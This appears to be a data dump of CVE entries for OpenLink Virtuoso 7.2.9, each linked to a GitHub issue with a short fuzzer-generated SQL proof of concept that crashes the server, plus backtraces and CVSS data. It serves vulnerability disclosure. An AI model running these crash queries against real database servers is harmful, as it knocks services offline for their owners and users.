The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x VARCHAR, y VARCHAR ); SELECT IFNULL(MIN(x), -1), IFNULL(MAX(x), -1) FROM ( SELECT x FROM t1 UNION ALL SELECT NULL ) AS temp; ``` backtrace: ```c #0 0x737010 (dfe_qexp_list+0x40) #1 0x73711d (dfe_qexp_list+0x14d) #2 0x747...
virtuoso 7.2.9 crashed at dfe_qexp_list
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1125/comments
1
2023-04-12T18:52:59Z
2023-04-17T19:07:44Z
https://github.com/openlink/virtuoso-opensource/issues/1125
1,665,077,173
1,125
CVE-2023-31613
2023-05-15T15:15:11.867
An issue in the __nss_database_lookup component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1121" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1121
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 (c1 INT, c2 BINARY(100),c3 FLOAT); INSERT INTO t1 VALUES (100,'abcdefghij',3.0); CREATE TABLE t2 (c1 INT, c2 VARCHAR(100)); INSERT INTO t2 VALUES (2,'abcde'); UPDATE t1 SET c2 = (SELECT MAX(c1) FROM t2); ``` backtrace: ```c #0 0x7fd63dbe3a7d (__ns...
virtuoso 7.2.9 crashed at __nss_database_lookup
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1121/comments
0
2023-04-12T18:46:15Z
2023-04-17T09:13:45Z
https://github.com/openlink/virtuoso-opensource/issues/1121
1,665,069,177
1,121
CVE-2023-31614
2023-05-15T15:15:11.913
An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1117" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1117
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
## Description When running the following statement on an empty virtuoso-opensource database, the database just crashed: ```sql SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables UNION SELECT column_name as name, data_type as type, table_name as parentname FROM informati...
virtuoso *crashed* after running a SELECT statement
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1117/comments
2
2023-04-10T17:55:59Z
2023-04-17T09:13:46Z
https://github.com/openlink/virtuoso-opensource/issues/1117
1,661,128,936
1,117
CVE-2023-31615
2023-05-15T15:15:11.963
An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1124
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x INTEGER UNIQUE); CREATE TABLE k(v varchar(255), excluded varchar(255)); INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0); SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL; ``` backtrace: ```c #0 0x4257c4 (chas...
virtuoso 7.2.9 crashed at chash_array
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1124/comments
0
2023-04-12T18:50:37Z
2023-04-14T12:55:18Z
https://github.com/openlink/virtuoso-opensource/issues/1124
1,665,074,357
1,124
CVE-2023-31616
2023-05-15T15:15:12.010
An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1122
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT MOD(-9223372036854775808, -1); ``` backtrace: ```c #0 0x66a32e (bif_mod+0xce) #1 0x74ae62 (sqlr_run_bif_in_sandbox+0x392) #2 0x79b598 (sqlp_patch_call_if_special_or_optimizable+0x1148) #3 0xccffe7 (scn3yyparse+0xc5d7) #4 0x6b995b (sql_compile_1+0x129b) #5...
virtuoso 7.2.9 crashed at bif_mod
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1122/comments
0
2023-04-12T18:47:44Z
2023-04-14T08:12:11Z
https://github.com/openlink/virtuoso-opensource/issues/1122
1,665,070,884
1,122
CVE-2023-31617
2023-05-15T15:15:12.057
An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1127
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f ...
virtuoso 7.2.9 crashed at dk_set_delete
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1127/comments
0
2023-04-12T19:01:25Z
2023-04-14T08:12:12Z
https://github.com/openlink/virtuoso-opensource/issues/1127
1,665,089,526
1,127
CVE-2023-31618
2023-05-15T15:15:12.110
An issue in the sqlc_union_dt_wrap component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1136
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT SUM(v), COUNT(*) FROM gstest_empty UNION ALL SELECT SUM(v), NULL FROM gstest_empty UNION ALL SELECT NULL, COUNT(*) FROM gstest_empty UNION ALL SELECT NULL, NULL ``` backtrace: ```c #0 0x81a65e (sqlc_union_dt_wrap+0x5e) #1 0x81a783 (sqlc_union_order+0x33...
virtuoso 7.2.9 crashed at sqlc_union_dt_wrap
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1136/comments
0
2023-04-12T19:34:10Z
2023-04-14T08:12:15Z
https://github.com/openlink/virtuoso-opensource/issues/1136
1,665,129,009
1,136
CVE-2023-31619
2023-05-15T15:15:12.170
An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1133" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1133
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR); CREATE VIEW t1 AS SELECT x, x FROM t1; UPDATE t1 SET x = x + 100; ``` backtrace: ```c #0 0x6080d1 (sch_name_to_object+0x11) #1 0x7dcf6f (sqlc_update_searched+0x6f) #2 0x817cd1 (sqlc_update_view+0xaa1) #3 0x7ddad0...
virtuoso 7.2.9 crashed at sch_name_to_object
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1133/comments
1
2023-04-12T19:26:23Z
2023-04-14T08:41:03Z
https://github.com/openlink/virtuoso-opensource/issues/1133
1,665,120,116
1,133
CVE-2023-31620
2023-05-15T15:15:12.237
An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1128" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1128
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE element ( name VARCHAR(80), test1 VARCHAR(80), f1 VARCHAR(80), f2 VARCHAR(80), code INTEGER, t1 VARCHAR(80), a VARCHAR(80), example VARCHAR(80), b VARCHAR(80), c VARCHAR(80), folder...
virtuoso 7.2.9 crashed at dv_compare
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1128/comments
0
2023-04-12T19:03:51Z
2023-04-17T18:53:42Z
https://github.com/openlink/virtuoso-opensource/issues/1128
1,665,092,932
1,128
CVE-2023-31621
2023-05-15T15:15:12.300
An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1130
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE brin_test(a INTEGER NOT NULL); INSERT INTO brin_test (a) VALUES(5); INSERT INTO brin_test (a) VALUES(5); ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ; UPDATE brin_test SET a = a + 1 WHERE a = 5; ``` backtrace: ```c #0 0x5cfed5 (kc_var_col+0x1...
virtuoso 7.2.9 crashed at kc_var_col
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1130/comments
0
2023-04-12T19:18:19Z
2023-04-14T12:55:17Z
https://github.com/openlink/virtuoso-opensource/issues/1130
1,665,110,745
1,130
CVE-2023-31622
2023-05-15T15:15:12.347
An issue in the sqlc_make_policy_trig component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1135
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL DELETE FROM ucview WHERE CURRENT OF c1; ``` backtrace: ```c #0 0x7d8904 (sqlc_make_policy_trig+0x54) #1 0x7ddf99 (sqlc_delete_pos+0x2e9) #2 0x6b6e53 (sql_stmt_comp+0x453) #3 0x6ba122 (sql_compile_1+0x1a62) #4 0x7c8cd0 (stmt_set_query+0x340) #5 0x7cabc2 (sf_sql_e...
virtuoso 7.2.9 crashed at sqlc_make_policy_trig
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1135/comments
0
2023-04-12T19:32:30Z
2023-04-14T08:12:14Z
https://github.com/openlink/virtuoso-opensource/issues/1135
1,665,127,014
1,135
CVE-2023-31623
2023-05-15T15:15:12.390
An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1131" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1131
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1( x INTEGER PRIMARY KEY, k VARCHAR ); CREATE VIEW t1 AS SELECT k, k FROM t1; UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128; ``` backtrace: ```c #0 0xe086e9 (mp_box_copy+0x9) #1 0xe08dd0 (mp_box_copy_tree+0xc0) #2 0x815b3a (sqlc_col_t...
virtuoso 7.2.9 crashed at mp_box_copy
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1131/comments
1
2023-04-12T19:21:09Z
2023-04-14T08:41:41Z
https://github.com/openlink/virtuoso-opensource/issues/1131
1,665,114,015
1,131
CVE-2023-31624
2023-05-15T15:15:12.437
An issue in the sinv_check_exp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1134" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1134
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE base_tbl (a int, b int); CREATE VIEW rw_view1 AS SELECT * FROM base_tbl; INSERT INTO rw_view1 VALUES (15); ``` backtrace: ```c #0 0x788dc0 (sinv_check_exp+0x120) #1 0x78a03d (sinv_sqlo_check_col_val+0xad) #2 0x816d50 (sqlc_insert_view+0x330) #3 0x6b...
virtuoso 7.2.9 crashed at sinv_check_exp
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1134/comments
0
2023-04-12T19:29:32Z
2023-04-14T08:12:14Z
https://github.com/openlink/virtuoso-opensource/issues/1134
1,665,123,657
1,134
CVE-2023-31625
2023-05-15T15:15:12.487
An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1132" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1132
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x LONG VARCHAR, a INTEGER DEFAULT 0, b LONG VARCHAR, t2 LONG VARCHAR ); CREATE VIEW t1 AS SELECT * FROM t1; INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000)); ``` backtrace: ```c #0 0x7f42...
virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118)
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1132/comments
1
2023-04-12T19:23:55Z
2023-04-14T08:20:16Z
https://github.com/openlink/virtuoso-opensource/issues/1132
1,665,117,118
1,132
CVE-2023-31626
2023-05-15T15:15:12.540
An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1129" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1129
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
**This crash seems can only be reproduced when compiling virtuoso with --with-debug.** **When using the docker container, the SQL statement will strangely make the client shell STUCK, but will not crash the server.** The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t4 ( a VARCHAR, b VARCHAR ); ...
virtuoso 7.2.9 crashed at gpf_notice
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1129/comments
0
2023-04-12T19:16:37Z
2023-04-14T08:12:13Z
https://github.com/openlink/virtuoso-opensource/issues/1129
1,665,108,794
1,129
CVE-2023-31627
2023-05-15T15:15:12.587
An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1140" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1140
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( a varchar(255) DEFAULT NULL ); SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)'); ``` backtrace: ```c #0 0xdece40 (strhash+0x20) #1 0xdec783 (id_hash_get+0x33) #2 0x59c5d1 (tb_name_to_column+0x41) #3 0x76aed1 (ot_is_defd+0x21...
virtuoso 7.2.9 crashed at strhash
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1140/comments
0
2023-04-12T19:41:37Z
2023-04-14T08:12:17Z
https://github.com/openlink/virtuoso-opensource/issues/1140
1,665,138,910
1,140
CVE-2023-31628
2023-05-15T15:15:12.633
An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1141" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1141
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x VARCHAR, k VARCHAR ); CREATE VIEW t1 AS SELECT x, k FROM t1; INSERT INTO t1 VALUES ('x', 'y'); ``` backtrace: ```c #0 0xeff7b6 (stricmp+0x6) #1 0x607569 (strihashcmp+0x29) #2 0xdec7af (id_hash_get+0x5f) #3 0x607e58 (sch_name_to_object_...
virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118)
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1141/comments
1
2023-04-12T19:43:47Z
2023-04-14T08:19:06Z
https://github.com/openlink/virtuoso-opensource/issues/1141
1,665,143,521
1,141
CVE-2023-31629
2023-05-15T15:15:12.677
An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1139" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1139
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT CASE WHEN EXISTS ( SELECT 1 FROM t2 WHERE x=1 INTERSECT SELECT 1 FROM t2 WHERE y=2 ) THEN 1 ELSE 0 END; ``` backtrace: ```c #0 0x76cd17 (sqlo_union_scope+0x67) #1 0x76cd10 (sqlo_union_scope+0x60) #2 0x76cd10 (sqlo_union_scope+0x60) #3 0x76dc84 ...
virtuoso 7.2.9 crashed at sqlo_union_scope
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1139/comments
0
2023-04-12T19:40:20Z
2023-04-14T08:12:16Z
https://github.com/openlink/virtuoso-opensource/issues/1139
1,665,136,195
1,139
CVE-2023-31630
2023-05-15T15:15:12.723
An issue in the sqlo_query_spec component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1138" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1138
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
